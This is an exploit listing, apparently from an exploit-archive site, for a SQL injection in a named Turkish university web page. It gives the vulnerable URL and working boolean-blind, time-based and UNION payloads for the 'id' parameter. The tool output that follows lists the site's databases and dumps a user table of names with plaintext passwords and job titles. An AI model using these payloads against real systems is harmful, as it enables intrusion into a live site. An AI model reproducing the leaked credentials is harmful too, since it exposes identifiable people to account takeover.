Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
N/A | CWE-89 | N/A | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2020-01-22 |
# Exploit Title: Bayburt niversitesi SQL njection # Date: 22.01.2020 # Exploit Author: Furkan zer # Vendor Homepage: bumer.bayburt.edu.tr Link##: https://bumer.bayburt.edu.tr/haber.php?id=[] sql li https://bumer.bayburt.edu.tr/haber.php?id=16 Payloads : id=16' AND 1280=1280 AND 'xtXi'='xtXi Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=16' AND 1280=1280 AND 'xtXi'='xtXi Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=16' AND (SELECT 6646 FROM (SELECT(SLEEP(5)))rjJt) AND 'AQkr'='AQkr Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: id=16' UNION ALL SELECT NULL,CONCAT(0x7162626271,0x795147476369727a5770775858705943614948507a7547516368485175506b535873724463487263,0x716b627071),NULL,NULL, NULL,NULL,NULL-- pPTp --- [19:18:07] [INFO] the back-end DBMS is MySQL web application technology: PHP 5.6.31, Apache 2.4.27, PHP back-end DBMS: MySQL >= 5.0.12 [19:18:07] [INFO] fetching database names available databases [6]: [*] cobozero_adsd69 [*] cobozero_bumer6 [*] information_schema [*] mysql [*] performance_schema [*] sys [162 entries] +--------------------------------+------------------+----------------------------+--------------------------------+ | adi | sifre | unvani | eposta | +--------------------------------+------------------+----------------------------+--------------------------------+ | ?ye Deneme | PkNKZyz1 | ??renci | [email protected] | | Muzaffer D?LEK | 19671967 | ??renci | [email protected] | | Emre TEKCE | 190612 | Yrd.Doc.Dr | [email protected] | | volkan gl | V273740g | Yrd. Do. Dr. | [email protected] | | Selma Birinci | 1q2w3e4r5t | <blank> | [email protected] | | Recep ?ATAR | dmr201500 | Ara?trma Grevlisi | [email protected] | | Selahattin Ko?unalp | oRmxs9AZ | Yardmc Doent | [email protected] | | ?ZKAN BAYRAM | Oxu8ALWH | Yrd. Do. Dr. | [email protected] |
Copyright ©2024 Exploitalert.